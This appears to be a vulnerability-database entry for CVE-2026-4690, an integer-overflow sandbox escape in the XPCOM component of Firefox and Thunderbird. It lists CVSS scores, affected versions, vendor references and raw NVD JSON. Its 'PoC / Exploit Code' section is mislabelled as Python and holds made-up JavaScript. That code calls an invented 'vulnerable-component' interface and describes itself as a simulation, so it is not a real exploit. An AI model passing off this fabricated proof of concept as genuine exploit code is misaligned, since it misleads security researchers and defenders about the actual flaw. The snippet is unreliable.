CVE-2026-4690

Description

Sandbox escape due to incorrect boundary conditions, integer overflow in the XPCOM component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9.

CVSS Details

CVSS Score

8.6

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:* - VULNERABLE

cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:* - VULNERABLE

Firefox < 149

Firefox ESR < 115.34

Firefox ESR < 140.9

Thunderbird < 149

Thunderbird < 140.9

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

/**
 * Conceptual Proof of Concept (PoC) for CVE-2026-4690
 * Demonstrating the integer overflow trigger in XPCOM.
 * Note: This is a simplified simulation for educational purposes.
 */

function triggerOverflow() {
    try {
        // Target the vulnerable XPCOM component interface
        const component = Components.classes["@mozilla.org/vulnerable-component;1"]
                                   .getService(Components.interfaces.nsIVulnerableInterface);

        // Malicious input designed to trigger integer overflow
        // Setting a size that wraps around when incremented
        let size = 0xFFFFFFF0;
        let padding = 32;

        console.log("[+] Attempting to allocate buffer with size: " + size);

        // The vulnerable method fails to check (size + padding) overflow
        // causing a small buffer allocation for a large data write later
        component.allocateBuffer(size, padding);

        console.log("[+] Overflow triggered. Sandbox integrity may be compromised.");

    } catch (e) {
        console.error("[-] Exploit failed: " + e.message);
    }
}

// Execute
triggerOverflow();

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4690
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4690
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4690/
[4] VulDB https://vuldb.com/cve/CVE-2026-4690
[5] https://bugzilla.mozilla.org/show_bug.cgi?id=2016375
[6] https://www.mozilla.org/security/advisories/mfsa2026-20/
[7] https://www.mozilla.org/security/advisories/mfsa2026-21/
[8] https://www.mozilla.org/security/advisories/mfsa2026-22/
[9] https://www.mozilla.org/security/advisories/mfsa2026-23/
[10] https://www.mozilla.org/security/advisories/mfsa2026-24/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4690", "sourceIdentifier": "[email protected]", "published": "2026-03-24T13:16:04.837", "lastModified": "2026-04-13T15:17:37.640", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sandbox escape due to incorrect boundary conditions, integer overflow in the XPCOM component. This vulnerability was fixed in Firefox 149, Firefox ESR 115.34, Firefox ESR 140.9, Thunderbird 149, and Thunderbird 140.9."}, {"lang": "es", "value": "Escape de sandbox debido a condiciones de límite incorrectas, desbordamiento de entero en el componente XPCOM. Esta vulnerabilidad afecta a Firefox < 149, Firefox ESR < 115.34, Firefox ESR < 140.9, Thunderbird < 149, y Thunderbird < 140.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H", "baseScore": 8.6, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 4.0}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.6, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-190"}, {"lang": "en", "value": "CWE-754"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-120"}, {"lang": "en", "value": "CWE-190"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionEndExcluding": "115.34.0", "matchCriteriaId": "063BE653-69B0-4543-9A90-BC7A62C943B5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:-:*:*:*", "versionEndExcluding": "149.0", "matchCriteriaId": "02F2B82F-E997-4D5F-BBB0-237E4962555B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:mozilla:firefox:*:*:*:*:esr:*:*:*", "versionStartIncluding": "128.0", "versionEndExcluding": "140.9.0", "matchCriteriaId": "525DEC0C-BB47-46C6-9AEB-98F27D4685FE"}]}]}], "references": [{"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=2016375", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-20/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-21/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-22/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-23/", "source": "[email protected]"}, {"url": "https://www.mozilla.org/security/advisories/mfsa2026-24/", "source": "[email protected]"}]}}